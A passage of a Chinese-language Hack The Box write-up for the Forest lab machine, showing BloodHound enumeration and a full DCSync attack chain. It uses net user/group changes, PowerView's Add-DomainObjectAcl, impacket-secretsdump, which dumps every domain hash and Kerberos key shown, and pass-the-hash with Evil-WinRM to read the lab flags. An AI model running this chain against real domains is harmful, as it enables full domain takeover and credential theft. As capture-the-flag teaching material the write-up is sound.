C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml: 026e516e-b814-414b-83cd-856d6fef4822

ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Bittrex Access Key and Access Key Regexes
C:\Users\svc-alfresco\Desktop\user.txt: 4b67b2d81b12e5bcab8f5c93964b402e

ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Droneci Access Token Regexes
C:\Users\svc-alfresco\Desktop\user.txt: 4b67b2d81b12e5bcab8f5c93964b402e

ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Flickr Access Token Regexes
C:\Users\svc-alfresco\Desktop\user.txt: 4b67b2d81b12e5bcab8f5c93964b402e

ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Kucoin Access Token Regexes
C:\Users\svc-alfresco\Desktop\user.txt: 4b67b2d81b12e5bcab8f5c93

ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Base32 Regexes
C:\Users\All Users\VMware\VMware CAF\pme\data\input\installProviderHeader.bat: PROVIDER
C:\Users\All Users\VMware\VMware CAF\pme\data\input\installProviderHeader.bat: INVOKERS
C:\Users\All Users\VMware\VMware CAF\pme\data\input\installProviderHeader.bat: PROVIDER
C:\Users\All Users\VMware\VMware CAF\pme\data\input\installProviderHeader.bat: COMMONPA

ÉÍÍÍÍÍÍÍÍÍ͹ Found Raw Hashes-md5 Regexes
C:\Users\svc-alfresco\Desktop\user.txt: 4b67b2d81b12e5bcab8f5c93964b402e

       /---------------------------------------------------------------------------------\                                                                                        
       |                             Do you like PEASS?                                  |                                                                                        
       |---------------------------------------------------------------------------------|                                                                                        
       |         Get the latest version    :     https://github.com/sponsors/carlospolop |                                                                                        
       |         Follow on Twitter         :     @hacktricks_live                        |                                                                                        
       |         Respect on HTB            :     SirBroccoli                             |                                                                                        
       |---------------------------------------------------------------------------------|                                                                                        
       |                                 Thank you!                                      |                                                                                        
       \---------------------------------------------------------------------------------/                                                                                        
                                                                                         
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 

27、这个工具像 LinEnum 一样，只不过这个是在Windows下的信息收集，而那个是在Linux下的信息收集

28、其实对于独立靶机来说，用上面的方法是可以获取到一些敏感信息，并进行提权的，但是这个是域主机，所以需要通过域的形式去提权。

29、这里原本想使用 BloodHound-py 和 BloodHound-py-ce 直接执行远程搜集下载的，但是我用的是社区版，且mac下有些因网络和三方库兼容等问题导致没法用，而kali下的默认的py版本，又和我装的 BloodHound 社区版不兼容，所以这里就直接用社区版自带的搜集工具了，远程搜集的命令是最简单的。

❯ bloodhound-python -c All -u 'svc-alfresco' -p 's3rvice' -ns 10.10.10.161 -d htb.local --zip

# 一条命令的事，但是不兼容，没法

30、接下来在本机上面进行上次 SharpHound.exe 工具进行信息收集

┌──(kali㉿kali)-[~/桌面]
└─$ evil-winrm -i 10.10.10.161 -u "svc-alfresco" -p "s3rvice"
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload /htb-tools/sharphound-v2.0.2/SharpHound.exe
                                        
Info: Uploading /home/kali/桌面//htb-tools/sharphound-v2.0.2/SharpHound.exe to C:\Users\svc-alfresco\Documents\SharpHound.exe
                                        
Data: 1508008 bytes of 1508008 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir


    Directory: C:\Users\svc-alfresco\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       12/21/2023  10:18 PM        1131008 SharpHound.exe


*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ./SharpHound.exe
2023-12-21T22:27:04.9312935-08:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2023-12-21T22:27:05.1344170-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, CertServices
2023-12-21T22:27:05.2125421-08:00|INFORMATION|Initializing SharpHound at 10:27 PM on 12/21/2023
2023-12-21T22:27:06.0094240-08:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for htb.local : FOREST.htb.local
2023-12-21T22:27:06.1344210-08:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, CertServices
2023-12-21T22:27:07.0562955-08:00|INFORMATION|Beginning LDAP search for Sharphound.EnumerationDomain
2023-12-21T22:27:07.0562955-08:00|INFORMATION|Testing ldap connection to htb.local
2023-12-21T22:27:07.3531713-08:00|INFORMATION|Producer has finished, closing LDAP channel
2023-12-21T22:27:07.3531713-08:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-12-21T22:27:37.4000566-08:00|INFORMATION|Status: 1 objects finished (+1 0.03333334)/s -- Using 44 MB RAM
2023-12-21T22:27:54.5944963-08:00|INFORMATION|Consumers finished, closing output channel
2023-12-21T22:27:54.6569964-08:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2023-12-21T22:27:54.9538717-08:00|INFORMATION|Status: 184 objects finished (+183 3.914894)/s -- Using 50 MB RAM
2023-12-21T22:27:54.9538717-08:00|INFORMATION|Enumeration finished in 00:00:47.8974508
2023-12-21T22:27:55.1569984-08:00|INFORMATION|Saving cache with stats: 119 ID to type mappings.
 118 name to SID mappings.
 1 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2023-12-21T22:27:55.1882471-08:00|INFORMATION|SharpHound Enumeration Completed at 10:27 PM on 12/21/2023! Happy Graphing!

31、下载到本机上面扫描的结果

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir


    Directory: C:\Users\svc-alfresco\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       12/21/2023  10:27 PM          19267 20231221222707_BloodHound.zip
-a----       12/21/2023  10:27 PM          19765 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a----       12/21/2023  10:18 PM        1131008 SharpHound.exe


*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 


*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20231221222707_BloodHound.zip
                                        
Info: Downloading C:\Users\svc-alfresco\Documents\20231221222707_BloodHound.zip to 20231221222707_BloodHound.zip                                                                  
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

32、然后我们把生成的采集器采集结果压缩包，放到 BloodHound 里进行探索

33、先将当前用户加入到路径的初始点那 SVC-ALFRESCO@HTB.LOCAL ，然后通过筛选目标域控的最短途径，勾选相关路径终点。

34、根据 bloodhound 的显示结果，可以发现这样的一组关系

35、利用链文字描述：

1、SVC-ALFRESCO@HTB.LOCAL

用户SVC-ALFRESCO@HTB.LOCAL是组SERVICE ACCOUNTS@HTB.LOCAL 的成员。
Active Directory 中的组向其成员授予组本身拥有的任何权限。如果一个组拥有另一个主体的权限，则该组中的用户/计算机以及该组内的其他组将继承这些权限

2、SERVICE ACCOUNTS@HTB.LOCAL

组SERVICE ACCOUNTS@HTB.LOCAL是组PRIVILEGED IT ACCOUNTS@HTB.LOCAL的成员。
Active Directory 中的组向其成员授予组本身拥有的任何权限。如果一个组拥有另一个主体的权限，则该组中的用户/计算机以及该组内的其他组将继承这些权限。

3、PRIVILEGED IT ACCOUNTS@HTB.LOCAL

组PRIVILEGED IT ACCOUNTS@HTB.LOCAL是组ACCOUNT OPERATORS@HTB.LOCAL的成员。

4、ACCOUNT OPERATORS@HTB.LOCAL

ACCOUNT OPERATORS@HTB.LOCAL 组的成员对EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL组具有GenericAll 权限。

5、EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL

EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL 组的成员有权修改域 HTB.LOCAL上的 DACL（自由访问控制列表）

6、HTB.LOCAL

36、也就是说，上述是一个经典的 DCSync 漏洞的利用链，下述是该靶机的利用过程：

# https://github.com/n00py/DCSync
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

┌──(kali㉿kali)-[~/桌面]
└─$ evil-winrm -i 10.10.10.161 -u "svc-alfresco" -p "s3rvice"
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user shiyan shiyan123$! /add /domain 
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" shiyan /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user shiyan
User name                    shiyan
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            12/28/2023 1:13:46 AM
Password expires             Never
Password changeable          12/29/2023 1:13:46 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Exchange Windows Perm*Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir


    Directory: C:\Users\svc-alfresco\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       12/28/2023  12:49 AM        1013912 mimikatz.exe
-a----       12/28/2023  12:54 AM         770279 PowerView.ps1


*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Import-Module "C:\Users\svc-alfresco\Documents\PowerView.ps1"
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $SecPassword = ConvertTo-SecureString 'shiyan123$!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb.local\shiyan', $SecPassword)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity shiyan -Rights DCSync
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 

37、然后使用新建的账号进行 secretsdump 工具进行转储hash密码

┌──(kali㉿kali)-[~/桌面]
└─$ impacket-secretsdump htb.local/shiyan@10.10.10.161 
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
shiyan:9601:aad3b435b51404eeaad3b435b51404ee:cf2f375aa3a6eb7486b11d898a31a02f:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:b965258a859b220bec975fbd69ed3ee7:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
shiyan:aes256-cts-hmac-sha1-96:e2c393e850fc78ba4d19ffcbb4d04588d0beebe2556e2715a912996c84c8e871
shiyan:aes128-cts-hmac-sha1-96:aae1e5baeb550c9a9dc3d4f08e9e5fd4
shiyan:des-cbc-md5:9bc8259426a76758
FOREST$:aes256-cts-hmac-sha1-96:6d30016a1887c2ebc4607489b4c4a995afa9e285ecc9801788ef784050e499b7
FOREST$:aes128-cts-hmac-sha1-96:33fcce511ded59dc8a64acaa2f01cc5c
FOREST$:des-cbc-md5:ad07fe7ae337f776
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...

38、这里重点是关注这一条hash密文信息

htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::

39、我们继续使用 evil-winrm 工具结合哈希传递的方式进行拿到最终的flag信息

┌──(kali㉿kali)-[~/桌面]
└─$ evil-winrm -i 10.10.10.161 -u "Administrator" -H "32693b11e6aa90eb43d32c72a07ceea6"
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
8e50e04ca3ff9a285b660a8ff0d3fbd8
*Evil-WinRM* PS C:\Users\Administrator\Documents>

40、技能小提示：涉及到哈希传递时目标地址使用IP地址，这是因为使用IP地址是使用NTLM机制进行密码效验的，如果是使用域名地址的话，就涉及到kerberos 协议了，无法进行哈希传递，只能进行票据伪造传递。

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/212